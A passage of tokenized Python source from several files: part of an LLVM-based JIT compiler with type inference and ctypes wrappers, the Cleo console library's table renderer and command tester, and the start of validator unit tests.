( self . exit_block ) <EOL> if '<STR_LIT>' in self . locals : <EOL> retval = self . builder . load ( self . 
locals [ '<STR_LIT>' ] ) <EOL> self . builder . ret ( retval ) <EOL> else : <EOL> self . builder . ret_void ( ) <EOL> def add_block ( self , name ) : <EOL> return self . function . append_basic_block ( name ) <EOL> def set_block ( self , block ) : <EOL> self . block = block <EOL> self . builder . position_at_end ( block ) <EOL> def cbranch ( self , cond , true_block , false_block ) : <EOL> self . builder . cbranch ( cond , true_block , false_block ) <EOL> def branch ( self , next_block ) : <EOL> self . builder . branch ( next_block ) <EOL> def specialize ( self , val ) : <EOL> if isinstance ( val . type , TVar ) : <EOL> return to_lltype ( self . spec_types [ val . type . s ] ) <EOL> else : <EOL> return val . type <EOL> def const ( self , val ) : <EOL> if isinstance ( val , ( int , long ) ) : <EOL> return Constant . int ( int_type , val ) <EOL> elif isinstance ( val , float ) : <EOL> return Constant . real ( double_type , val ) <EOL> elif isinstance ( val , bool ) : <EOL> return Constant . int ( bool_type , int ( val ) ) <EOL> elif isinstance ( val , str ) : <EOL> return Constant . stringz ( val ) <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_LitInt ( self , node ) : <EOL> ty = self . specialize ( node ) <EOL> if ty is double_type : <EOL> return Constant . real ( double_type , node . n ) <EOL> elif ty == int_type : <EOL> return Constant . int ( int_type , node . n ) <EOL> def visit_LitFloat ( self , node ) : <EOL> ty = self . specialize ( node ) <EOL> if ty is double_type : <EOL> return Constant . real ( double_type , node . n ) <EOL> elif ty == int_type : <EOL> return Constant . int ( int_type , node . n ) <EOL> def visit_Noop ( self , node ) : <EOL> pass <EOL> def visit_Fun ( self , node ) : <EOL> rettype = to_lltype ( self . retty ) <EOL> argtypes = map ( to_lltype , self . argtys ) <EOL> func_name = mangler ( node . fname , self . argtys ) <EOL> self . 
start_function ( func_name , module , rettype , argtypes ) <EOL> for ( ar , llarg , argty ) in zip ( node . args , self . function . args , self . argtys ) : <EOL> name = ar . id <EOL> llarg . name = name <EOL> if is_array ( argty ) : <EOL> zero = self . const ( <NUM_LIT:0> ) <EOL> one = self . const ( <NUM_LIT:1> ) <EOL> two = self . const ( <NUM_LIT:2> ) <EOL> data = self . builder . gep ( llarg , [ <EOL> zero , zero ] , name = ( name + '<STR_LIT>' ) ) <EOL> dims = self . builder . gep ( llarg , [ <EOL> zero , one ] , name = ( name + '<STR_LIT>' ) ) <EOL> shape = self . builder . gep ( llarg , [ <EOL> zero , two ] , name = ( name + '<STR_LIT>' ) ) <EOL> self . arrays [ name ] [ '<STR_LIT:data>' ] = self . builder . load ( data ) <EOL> self . arrays [ name ] [ '<STR_LIT>' ] = self . builder . load ( dims ) <EOL> self . arrays [ name ] [ '<STR_LIT>' ] = self . builder . load ( shape ) <EOL> self . locals [ name ] = llarg <EOL> else : <EOL> argref = self . builder . alloca ( to_lltype ( argty ) ) <EOL> self . builder . store ( llarg , argref ) <EOL> self . locals [ name ] = argref <EOL> if rettype is not void_type : <EOL> self . locals [ '<STR_LIT>' ] = self . builder . alloca ( rettype , name = "<STR_LIT>" ) <EOL> map ( self . visit , node . body ) <EOL> self . end_function ( ) <EOL> def visit_Index ( self , node ) : <EOL> if isinstance ( node . val , Var ) and node . val . id in self . arrays : <EOL> val = self . visit ( node . val ) <EOL> ix = self . visit ( node . ix ) <EOL> dataptr = self . arrays [ node . val . id ] [ '<STR_LIT:data>' ] <EOL> ret = self . builder . gep ( dataptr , [ ix ] ) <EOL> return self . builder . load ( ret ) <EOL> else : <EOL> val = self . visit ( node . val ) <EOL> ix = self . visit ( node . ix ) <EOL> ret = self . builder . gep ( val , [ ix ] ) <EOL> return self . builder . load ( ret ) <EOL> def visit_Var ( self , node ) : <EOL> return self . builder . load ( self . locals [ node . 
id ] ) <EOL> def visit_Return ( self , node ) : <EOL> val = self . visit ( node . val ) <EOL> if val . type != void_type : <EOL> self . builder . store ( val , self . locals [ '<STR_LIT>' ] ) <EOL> self . builder . branch ( self . exit_block ) <EOL> def visit_Loop ( self , node ) : <EOL> init_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> test_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> body_block = self . function . append_basic_block ( '<STR_LIT>' ) <EOL> end_block = self . function . append_basic_block ( "<STR_LIT>" ) <EOL> self . branch ( init_block ) <EOL> self . set_block ( init_block ) <EOL> start = self . visit ( node . begin ) <EOL> stop = self . visit ( node . end ) <EOL> step = <NUM_LIT:1> <EOL> varname = node . var . id <EOL> inc = self . builder . alloca ( int_type , name = varname ) <EOL> self . builder . store ( start , inc ) <EOL> self . locals [ varname ] = inc <EOL> self . branch ( test_block ) <EOL> self . set_block ( test_block ) <EOL> cond = self . builder . icmp ( lc . ICMP_SLT , self . builder . load ( inc ) , stop ) <EOL> self . builder . cbranch ( cond , body_block , end_block ) <EOL> self . set_block ( body_block ) <EOL> map ( self . visit , node . body ) <EOL> succ = self . builder . add ( self . const ( step ) , self . builder . load ( inc ) ) <EOL> self . builder . store ( succ , inc ) <EOL> self . builder . branch ( test_block ) <EOL> self . set_block ( end_block ) <EOL> def visit_Prim ( self , node ) : <EOL> if node . fn == "<STR_LIT>" : <EOL> ref = node . args [ <NUM_LIT:0> ] <EOL> shape = self . arrays [ ref . id ] [ '<STR_LIT>' ] <EOL> return shape <EOL> elif node . fn == "<STR_LIT>" : <EOL> a = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> b = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> if a . type == double_type : <EOL> return self . builder . fmul ( a , b ) <EOL> else : <EOL> return self . builder . mul ( a , b ) <EOL> elif node . fn == "<STR_LIT>" : <EOL> a = self . 
visit ( node . args [ <NUM_LIT:0> ] ) <EOL> b = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> if a . type == double_type : <EOL> return self . builder . fadd ( a , b ) <EOL> else : <EOL> return self . builder . add ( a , b ) <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Assign ( self , node ) : <EOL> if node . ref in self . locals : <EOL> name = node . ref <EOL> var = self . locals [ name ] <EOL> val = self . visit ( node . val ) <EOL> self . builder . store ( val , var ) <EOL> self . locals [ name ] = var <EOL> return var <EOL> else : <EOL> name = node . ref <EOL> val = self . visit ( node . val ) <EOL> ty = self . specialize ( node ) <EOL> var = self . builder . alloca ( ty , name = name ) <EOL> self . builder . store ( val , var ) <EOL> self . locals [ name ] = var <EOL> return var <EOL> def visit ( self , node ) : <EOL> name = "<STR_LIT>" % type ( node ) . __name__ <EOL> if hasattr ( self , name ) : <EOL> return getattr ( self , name ) ( node ) <EOL> else : <EOL> return self . generic_visit ( node ) <EOL> _nptypemap = { <EOL> '<STR_LIT:i>' : ctypes . c_int , <EOL> '<STR_LIT:f>' : ctypes . c_float , <EOL> '<STR_LIT:d>' : ctypes . c_double , <EOL> } <EOL> def mangler ( fname , sig ) : <EOL> return fname + str ( hash ( tuple ( sig ) ) ) <EOL> def wrap_module ( sig , llfunc ) : <EOL> pfunc = wrap_function ( llfunc , engine ) <EOL> dispatch = dispatcher ( pfunc ) <EOL> return dispatch <EOL> def wrap_function ( func , engine ) : <EOL> args = func . type . pointee . args <EOL> ret_type = func . type . pointee . return_type <EOL> ret_ctype = wrap_type ( ret_type ) <EOL> args_ctypes = map ( wrap_type , args ) <EOL> functype = ctypes . CFUNCTYPE ( ret_ctype , * args_ctypes ) <EOL> fptr = engine . get_pointer_to_function ( func ) <EOL> cfunc = functype ( fptr ) <EOL> cfunc . __name__ = func . name <EOL> return cfunc <EOL> def wrap_type ( llvm_type ) : <EOL> kind = llvm_type . kind <EOL> if kind == lc . 
TYPE_INTEGER : <EOL> ctype = getattr ( ctypes , "<STR_LIT>" + str ( llvm_type . width ) ) <EOL> elif kind == lc . TYPE_DOUBLE : <EOL> ctype = ctypes . c_double <EOL> elif kind == lc . TYPE_FLOAT : <EOL> ctype = ctypes . c_float <EOL> elif kind == lc . TYPE_VOID : <EOL> ctype = None <EOL> elif kind == lc . TYPE_POINTER : <EOL> pointee = llvm_type . pointee <EOL> p_kind = pointee . kind <EOL> if p_kind == lc . TYPE_INTEGER : <EOL> width = pointee . width <EOL> if width == <NUM_LIT:8> : <EOL> ctype = ctypes . c_char_p <EOL> else : <EOL> ctype = ctypes . POINTER ( wrap_type ( pointee ) ) <EOL> elif p_kind == lc . TYPE_VOID : <EOL> ctype = ctypes . c_void_p <EOL> else : <EOL> ctype = ctypes . POINTER ( wrap_type ( pointee ) ) <EOL> elif kind == lc . TYPE_STRUCT : <EOL> struct_name = llvm_type . name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> struct_name = struct_name . encode ( '<STR_LIT:ascii>' ) <EOL> struct_type = None <EOL> if struct_type and issubclass ( struct_type , ctypes . Structure ) : <EOL> return struct_type <EOL> if hasattr ( struct_type , '<STR_LIT>' ) : <EOL> names = struct_type . _fields_ <EOL> else : <EOL> names = [ "<STR_LIT>" + str ( n ) for n in range ( llvm_type . element_count ) ] <EOL> ctype = type ( ctypes . Structure ) ( struct_name , ( ctypes . Structure , ) , <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> fields = [ ( name , wrap_type ( elem ) ) <EOL> for name , elem in zip ( names , llvm_type . elements ) ] <EOL> setattr ( ctype , '<STR_LIT>' , fields ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % kind ) <EOL> return ctype <EOL> def wrap_ndarray ( na ) : <EOL> ctype = _nptypemap [ na . dtype . char ] <EOL> _shape = list ( na . shape ) <EOL> data = na . ctypes . data_as ( ctypes . POINTER ( ctype ) ) <EOL> dims = len ( na . strides ) <EOL> shape = ( ctypes . c_int * dims ) ( * _shape ) <EOL> return ( data , dims , shape ) <EOL> def wrap_arg ( arg , val ) : <EOL> if isinstance ( val , np . ndarray ) : <EOL> ndarray = arg . 
_type_ <EOL> data , dims , shape = wrap_ndarray ( val ) <EOL> return ndarray ( data , dims , shape ) <EOL> else : <EOL> return val <EOL> def dispatcher ( fn ) : <EOL> def _call_closure ( * args ) : <EOL> cargs = list ( fn . _argtypes_ ) <EOL> pargs = list ( args ) <EOL> rargs = map ( wrap_arg , cargs , pargs ) <EOL> return fn ( * rargs ) <EOL> _call_closure . __name__ = fn . __name__ <EOL> return _call_closure <EOL> module = lc . Module . new ( '<STR_LIT>' ) <EOL> engine = None <EOL> function_cache = { } <EOL> tm = le . TargetMachine . new ( features = '<STR_LIT>' , cm = le . CM_JITDEFAULT ) <EOL> eb = le . EngineBuilder . new ( module ) <EOL> engine = eb . create ( tm ) <EOL> def autojit ( fn ) : <EOL> transformer = PythonVisitor ( ) <EOL> ast = transformer ( fn ) <EOL> ( ty , mgu ) = typeinfer ( ast ) <EOL> debug ( dump ( ast ) ) <EOL> return specialize ( ast , ty , mgu ) <EOL> def arg_pytype ( arg ) : <EOL> if isinstance ( arg , np . ndarray ) : <EOL> if arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( int32 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( int64 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT>' ) : <EOL> return array ( double64 ) <EOL> elif arg . dtype == np . dtype ( '<STR_LIT:float>' ) : <EOL> return array ( float32 ) <EOL> elif isinstance ( arg , int ) & ( arg < sys . 
maxint ) : <EOL> return int64 <EOL> elif isinstance ( arg , float ) : <EOL> return double64 <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % type ( arg ) ) <EOL> def specialize ( ast , infer_ty , mgu ) : <EOL> def _wrapper ( * args ) : <EOL> types = map ( arg_pytype , list ( args ) ) <EOL> spec_ty = TFun ( argtys = types , retty = TVar ( "<STR_LIT>" ) ) <EOL> unifier = unify ( infer_ty , spec_ty ) <EOL> specializer = compose ( unifier , mgu ) <EOL> retty = apply ( specializer , TVar ( "<STR_LIT>" ) ) <EOL> argtys = [ apply ( specializer , ty ) for ty in types ] <EOL> debug ( '<STR_LIT>' , TFun ( argtys , retty ) ) <EOL> if determined ( retty ) and all ( map ( determined , argtys ) ) : <EOL> key = mangler ( ast . fname , argtys ) <EOL> if key in function_cache : <EOL> return function_cache [ key ] ( * args ) <EOL> else : <EOL> llfunc = codegen ( ast , specializer , retty , argtys ) <EOL> pyfunc = wrap_module ( argtys , llfunc ) <EOL> function_cache [ key ] = pyfunc <EOL> return pyfunc ( * args ) <EOL> else : <EOL> raise UnderDeteremined ( ) <EOL> return _wrapper <EOL> def typeinfer ( ast ) : <EOL> infer = TypeInfer ( ) <EOL> ty = infer . visit ( ast ) <EOL> mgu = solve ( infer . constraints ) <EOL> infer_ty = apply ( mgu , ty ) <EOL> debug ( infer_ty ) <EOL> debug ( mgu ) <EOL> debug ( infer . constraints ) <EOL> return ( infer_ty , mgu ) <EOL> def codegen ( ast , specializer , retty , argtys ) : <EOL> cgen = LLVMEmitter ( specializer , retty , argtys ) <EOL> mod = cgen . visit ( ast ) <EOL> cgen . function . verify ( ) <EOL> tm = le . TargetMachine . new ( opt = <NUM_LIT:3> , cm = le . CM_JITDEFAULT , features = '<STR_LIT>' ) <EOL> pms = lp . build_pass_managers ( tm = tm , <EOL> fpm = False , <EOL> mod = module , <EOL> opt = <NUM_LIT:3> , <EOL> vectorize = False , <EOL> loop_vectorize = True ) <EOL> pms . pm . run ( module ) <EOL> debug ( cgen . function ) <EOL> debug ( module . to_native_assembly ( ) ) <EOL> return cgen . 
function <EOL> def debug ( fmt , * args ) : <EOL> if DEBUG : <EOL> print ( '<STR_LIT:=>' * <NUM_LIT> ) <EOL> print ( fmt , * args ) </s>
<s> from __future__ import division <EOL> from collections import OrderedDict <EOL> from . . exceptions import CleoException <EOL> from . table_style import TableStyle <EOL> from . table_cell import TableCell <EOL> from . table_separator import TableSeparator <EOL> from . helper import Helper <EOL> class Table ( object ) : <EOL> """<STR_LIT>""" <EOL> styles = None <EOL> def __init__ ( self , output ) : <EOL> """<STR_LIT>""" <EOL> self . _output = output <EOL> self . _headers = [ ] <EOL> self . _rows = [ ] <EOL> self . _column_widths = { } <EOL> self . _number_of_columns = None <EOL> self . _style = None <EOL> self . _column_styles = { } <EOL> if not self . __class__ . styles : <EOL> self . __class__ . styles = self . _init_styles ( ) <EOL> self . set_style ( '<STR_LIT:default>' ) <EOL> @ classmethod <EOL> def set_style_definition ( cls , name , table_style ) : <EOL> """<STR_LIT>""" <EOL> if not cls . styles : <EOL> cls . styles = cls . _init_styles ( ) <EOL> cls . styles [ name ] = table_style <EOL> def set_style ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , TableStyle ) : <EOL> self . _style = name <EOL> elif name in self . styles : <EOL> self . _style = self . styles [ name ] <EOL> else : <EOL> raise CleoException ( '<STR_LIT>' % name ) <EOL> return self <EOL> def get_style ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _style <EOL> def set_column_style ( self , column_index , name ) : <EOL> """<STR_LIT>""" <EOL> column_index = int ( column_index ) <EOL> if isinstance ( name , TableStyle ) : <EOL> self . _column_styles [ column_index ] = name <EOL> elif name in self . styles : <EOL> self . _column_styles [ column_index ] = self . styles [ name ] <EOL> else : <EOL> raise CleoException ( '<STR_LIT>' % name ) <EOL> def get_column_style ( self , column_index ) : <EOL> """<STR_LIT>""" <EOL> if column_index in self . _column_styles : <EOL> return self . _column_styles [ column_index ] <EOL> return self . 
_style <EOL> def set_headers ( self , headers ) : <EOL> if headers and not isinstance ( headers [ <NUM_LIT:0> ] , list ) : <EOL> headers = [ headers ] <EOL> self . _headers = headers <EOL> return self <EOL> def set_rows ( self , rows ) : <EOL> self . _rows = [ ] <EOL> self . add_rows ( rows ) <EOL> return self <EOL> def add_rows ( self , rows ) : <EOL> for row in rows : <EOL> self . add_row ( row ) <EOL> return self <EOL> def add_row ( self , row ) : <EOL> if isinstance ( row , TableSeparator ) : <EOL> self . _rows . append ( row ) <EOL> return self <EOL> if not isinstance ( row , list ) : <EOL> raise CleoException ( '<STR_LIT>' ) <EOL> self . _rows . append ( row ) <EOL> return self <EOL> def set_row ( self , column , row ) : <EOL> self . _rows [ column ] = row <EOL> return self <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _calculate_number_of_columns ( ) <EOL> rows = self . _build_table_rows ( self . _rows ) <EOL> headers = self . _build_table_rows ( self . _headers ) <EOL> self . _calculate_columns_width ( headers + rows ) <EOL> self . _render_row_separator ( ) <EOL> if headers : <EOL> for header in headers : <EOL> self . _render_row ( header , self . _style . cell_header_format ) <EOL> self . _render_row_separator ( ) <EOL> for row in rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> self . _render_row_separator ( ) <EOL> else : <EOL> self . _render_row ( row , self . _style . cell_row_format ) <EOL> if rows : <EOL> self . _render_row_separator ( ) <EOL> self . _cleanup ( ) <EOL> def _render_row_separator ( self ) : <EOL> """<STR_LIT>""" <EOL> count = self . _number_of_columns <EOL> if not count : <EOL> return <EOL> if not self . _style . horizontal_border_char and not self . _style . crossing_char : <EOL> return <EOL> markup = self . _style . crossing_char <EOL> for column in range ( <NUM_LIT:0> , count ) : <EOL> markup += self . _style . horizontal_border_char * self . _column_widths [ column ] + self . _style . 
crossing_char <EOL> self . _output . writeln ( self . _style . border_format % markup ) <EOL> def _render_column_separator ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _output . write ( self . _style . border_format % self . _style . vertical_border_char ) <EOL> def _render_row ( self , row , cell_format ) : <EOL> """<STR_LIT>""" <EOL> if not row : <EOL> return <EOL> self . _render_column_separator ( ) <EOL> for column in self . _get_row_columns ( row ) : <EOL> self . _render_cell ( row , column , cell_format ) <EOL> self . _render_column_separator ( ) <EOL> self . _output . writeln ( '<STR_LIT>' ) <EOL> def _render_cell ( self , row , column , cell_format ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cell = row [ column ] <EOL> except IndexError : <EOL> cell = '<STR_LIT>' <EOL> width = self . _column_widths [ column ] <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> for next_column in range ( column + <NUM_LIT:1> , column + cell . colspan ) : <EOL> width += self . _get_column_separator_width ( ) + self . _column_widths [ next_column ] <EOL> width += len ( cell ) - Helper . len ( cell ) <EOL> style = self . get_column_style ( column ) <EOL> if isinstance ( cell , TableSeparator ) : <EOL> self . _output . write ( style . border_format % ( style . horizontal_border_char * width ) ) <EOL> else : <EOL> width += Helper . len ( cell ) - Helper . len_without_decoration ( self . _output . get_formatter ( ) , cell ) <EOL> content = style . cell_row_content_format % cell <EOL> self . _output . write ( cell_format % getattr ( content , style . pad_type ) ( width , style . padding_char ) ) <EOL> def _calculate_number_of_columns ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _number_of_columns is not None : <EOL> return <EOL> columns = [ <NUM_LIT:0> ] <EOL> for row in self . _headers + self . _rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> continue <EOL> columns . append ( self . _get_number_of_columns ( row ) ) <EOL> self . 
_number_of_columns = max ( columns ) <EOL> def _build_table_rows ( self , rows ) : <EOL> unmerged_rows = OrderedDict ( ) <EOL> row_key = <NUM_LIT:0> <EOL> while row_key < len ( rows ) : <EOL> rows = self . _fill_next_rows ( rows , row_key ) <EOL> for column , cell in enumerate ( rows [ row_key ] ) : <EOL> if '<STR_LIT:\n>' not in cell : <EOL> continue <EOL> lines = cell . split ( '<STR_LIT:\n>' ) <EOL> for line_key , line in enumerate ( lines ) : <EOL> if isinstance ( cell , TableCell ) : <EOL> line = TableCell ( line , colspan = cell . colspan ) <EOL> if <NUM_LIT:0> == line_key : <EOL> rows [ row_key ] [ column ] = line <EOL> else : <EOL> if row_key not in unmerged_rows : <EOL> unmerged_rows [ row_key ] = OrderedDict ( ) <EOL> if line_key not in unmerged_rows [ row_key ] : <EOL> unmerged_rows [ row_key ] [ line_key ] = OrderedDict ( ) <EOL> unmerged_rows [ row_key ] [ line_key ] [ column ] = line <EOL> row_key += <NUM_LIT:1> <EOL> table_rows = [ ] <EOL> for row_key , row in enumerate ( rows ) : <EOL> table_rows . append ( self . _fill_cells ( row ) ) <EOL> if row_key in unmerged_rows : <EOL> for line in unmerged_rows [ row_key ] : <EOL> if line <= len ( table_rows ) : <EOL> new_row = [ ] <EOL> for column , value in enumerate ( row ) : <EOL> if column in unmerged_rows [ row_key ] [ line ] : <EOL> new_row . append ( unmerged_rows [ row_key ] [ line ] [ column ] ) <EOL> else : <EOL> new_row . append ( '<STR_LIT>' ) <EOL> table_rows . append ( new_row ) <EOL> else : <EOL> for column in unmerged_rows [ row_key ] [ line ] : <EOL> table_rows [ line ] [ column ] = unmerged_rows [ row_key ] [ line ] [ column ] <EOL> return table_rows <EOL> def _fill_next_rows ( self , rows , line ) : <EOL> """<STR_LIT>""" <EOL> unmerged_rows = OrderedDict ( ) <EOL> for column , cell in enumerate ( rows [ line ] ) : <EOL> if isinstance ( cell , TableCell ) and cell . rowspan > <NUM_LIT:1> : <EOL> nb_lines = cell . 
rowspan - <NUM_LIT:1> <EOL> lines = [ cell ] <EOL> if '<STR_LIT:\n>' in cell : <EOL> lines = cell . split ( '<STR_LIT:\n>' ) <EOL> if len ( lines ) > nb_lines : <EOL> nb_lines = cell . count ( '<STR_LIT:\n>' ) <EOL> rows [ line ] [ column ] = TableCell ( lines [ <NUM_LIT:0> ] , colspan = cell . colspan ) <EOL> placeholder = OrderedDict ( [ ( k , OrderedDict ( ) ) for k in range ( line + <NUM_LIT:1> , line + <NUM_LIT:1> + nb_lines ) ] ) <EOL> for k , v in unmerged_rows . items ( ) : <EOL> if k in placeholder : <EOL> for l , m in unmerged_rows [ k ] . items ( ) : <EOL> if l in placeholder [ k ] : <EOL> placeholder [ k ] [ l ] . update ( m ) <EOL> else : <EOL> placeholder [ k ] [ l ] = m <EOL> else : <EOL> placeholder [ k ] = v <EOL> unmerged_rows = placeholder <EOL> for unmerged_row_key , unmerged_row in unmerged_rows . items ( ) : <EOL> value = '<STR_LIT>' <EOL> if unmerged_row_key - line < len ( lines ) : <EOL> value = lines [ unmerged_row_key - line ] <EOL> unmerged_rows [ unmerged_row_key ] [ column ] = TableCell ( value , colspan = cell . colspan ) <EOL> for unmerged_row_key , unmerged_row in unmerged_rows . items ( ) : <EOL> if ( unmerged_row_key < len ( rows ) <EOL> and isinstance ( rows [ unmerged_row_key ] , list ) <EOL> and ( self . _get_number_of_columns ( rows [ unmerged_row_key ] ) <EOL> + self . _get_number_of_columns ( list ( unmerged_rows [ unmerged_row_key ] . values ( ) ) ) <EOL> <= self . _number_of_columns ) ) : <EOL> for cell_key , cell in unmerged_row . items ( ) : <EOL> rows [ unmerged_row_key ] . insert ( cell_key , cell ) <EOL> else : <EOL> row = self . _copy_row ( rows , unmerged_row_key - <NUM_LIT:1> ) <EOL> for column , cell in unmerged_row . items ( ) : <EOL> if len ( cell ) : <EOL> row [ column ] = unmerged_row [ column ] <EOL> rows . insert ( unmerged_row_key , row ) <EOL> return rows <EOL> def _fill_cells ( self , row ) : <EOL> """<STR_LIT>""" <EOL> new_row = [ ] <EOL> for column , cell in enumerate ( row ) : <EOL> new_row . 
append ( cell ) <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> for position in range ( column + <NUM_LIT:1> , column + cell . colspan ) : <EOL> new_row . append ( '<STR_LIT>' ) <EOL> if new_row : <EOL> return new_row <EOL> return row <EOL> def _copy_row ( self , rows , line ) : <EOL> """<STR_LIT>""" <EOL> row = [ x for x in rows [ line ] ] <EOL> for cell_key , cell_value in enumerate ( row ) : <EOL> row [ cell_key ] = '<STR_LIT>' <EOL> if isinstance ( cell_value , TableCell ) : <EOL> row [ cell_key ] = TableCell ( '<STR_LIT>' , colspan = cell_value . colspan ) <EOL> return row <EOL> def _get_number_of_columns ( self , row ) : <EOL> """<STR_LIT>""" <EOL> columns = len ( row ) <EOL> for column in row : <EOL> if isinstance ( column , TableCell ) : <EOL> columns += column . colspan - <NUM_LIT:1> <EOL> return columns <EOL> def _get_row_columns ( self , row ) : <EOL> """<STR_LIT>""" <EOL> columns = list ( range ( <NUM_LIT:0> , self . _number_of_columns ) ) <EOL> for cell_key , cell in enumerate ( row ) : <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> columns = [ x for x in columns if x not in list ( range ( cell_key + <NUM_LIT:1> , cell_key + cell . colspan ) ) ] <EOL> return columns <EOL> def _calculate_columns_width ( self , rows ) : <EOL> """<STR_LIT>""" <EOL> for column in range ( <NUM_LIT:0> , self . _number_of_columns ) : <EOL> lengths = [ ] <EOL> for row in rows : <EOL> if isinstance ( row , TableSeparator ) : <EOL> continue <EOL> lengths . append ( self . _get_cell_width ( row , column ) ) <EOL> self . _column_widths [ column ] = max ( lengths ) + len ( self . _style . cell_row_content_format ) - <NUM_LIT:2> <EOL> def _get_column_separator_width ( self ) : <EOL> return len ( self . _style . border_format % self . _style . vertical_border_char ) <EOL> def _get_cell_width ( self , row , column ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cell = row [ column ] <EOL> cell_width = Helper . 
len_without_decoration ( self . _output . get_formatter ( ) , cell ) <EOL> if isinstance ( cell , TableCell ) and cell . colspan > <NUM_LIT:1> : <EOL> cell_width = cell_width // cell . colspan <EOL> return cell_width <EOL> except IndexError : <EOL> return <NUM_LIT:0> <EOL> def _cleanup ( self ) : <EOL> self . _column_widths = { } <EOL> self . _number_of_columns = None <EOL> @ classmethod <EOL> def _init_styles ( cls ) : <EOL> borderless = TableStyle ( ) <EOL> borderless . set_horizontal_border_char ( '<STR_LIT:=>' ) <EOL> borderless . set_vertical_border_char ( '<STR_LIT:U+0020>' ) <EOL> borderless . set_crossing_char ( '<STR_LIT:U+0020>' ) <EOL> compact = TableStyle ( ) <EOL> compact . set_horizontal_border_char ( '<STR_LIT>' ) <EOL> compact . set_vertical_border_char ( '<STR_LIT:U+0020>' ) <EOL> compact . set_crossing_char ( '<STR_LIT>' ) <EOL> compact . set_cell_row_content_format ( '<STR_LIT:%s>' ) <EOL> return { <EOL> '<STR_LIT:default>' : TableStyle ( ) , <EOL> '<STR_LIT>' : borderless , <EOL> '<STR_LIT>' : compact <EOL> } </s>
<s> from io import BytesIO <EOL> from . . inputs . list_input import ListInput <EOL> from . . outputs . stream_output import StreamOutput <EOL> class CommandTester ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command ) : <EOL> """<STR_LIT>""" <EOL> self . __command = command <EOL> self . __input = None <EOL> self . __output = None <EOL> def execute ( self , input_ , options = None ) : <EOL> """<STR_LIT>""" <EOL> options = options or { } <EOL> self . __input = ListInput ( input_ ) <EOL> if '<STR_LIT>' in options : <EOL> self . __input . set_interactive ( options [ '<STR_LIT>' ] ) <EOL> self . __output = StreamOutput ( BytesIO ( ) ) <EOL> if '<STR_LIT>' in options : <EOL> self . __output . set_decorated ( options [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in options : <EOL> self . __output . set_verbosity ( options [ '<STR_LIT>' ] ) <EOL> return self . __command . run ( self . __input , self . __output ) <EOL> def get_display ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __output . get_stream ( ) . seek ( <NUM_LIT:0> ) <EOL> return self . __output . get_stream ( ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def get_input ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __input <EOL> def get_output ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __output </s>
<s> from cleo . commands import Command <EOL> class FoobarCommand ( Command ) : <EOL> def configure ( self ) : <EOL> self . set_name ( '<STR_LIT>' ) . set_description ( '<STR_LIT>' ) <EOL> def execute ( self , input_ , output_ ) : <EOL> self . input = input_ <EOL> self . output = output_ </s>
<s> from . . import CleoTestCase <EOL> from cleo . validators import ( <EOL> Validator , ValidationError , <EOL> Boolean , Enum , Choice , Callable , <EOL> Integer , Float , Range <EOL> ) <EOL> class ValidatorTestCase ( CleoTestCase ) : <EOL> def test_is_valid ( self ) : <EOL> """<STR_LIT>""" <EOL> validator = Validator ( ) <EOL> validator . validate = self . mock ( ) . MagicMock ( return_value = True ) <EOL> self . assertTrue ( validator . is_valid ( '<STR_LIT:foo>' ) ) <EOL> validator . validate = self . mock ( ) . MagicMock ( return_value = False ) <EOL> self . assertTrue ( validator . is_valid ( '<STR_LIT:foo>' ) ) <EOL> def test_error ( self ) : <EOL> validator = Validator ( ) <EOL> validator . name = '<STR_LIT:foo>' <EOL> self . assertRaises ( ValidationError , validator . error , '<STR_LIT:foo>' ) <EOL> class BooleanTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Boolean ( ) <EOL> self . assertTrue ( validator . validate ( True ) ) <EOL> self . assertFalse ( validator . validate ( False ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:1>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:0>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:true>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:false>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:yes>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT:y>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT:n>' ) ) <EOL> self . assertTrue ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( validator . validate ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( ValidationError , validator . validate , '<STR_LIT:foo>' ) <EOL> class EnumTestCase ( CleoTestCase ) : <EOL> def test_validate ( self ) : <EOL> validator = Enum ( [ '<STR_LIT:foo>' , 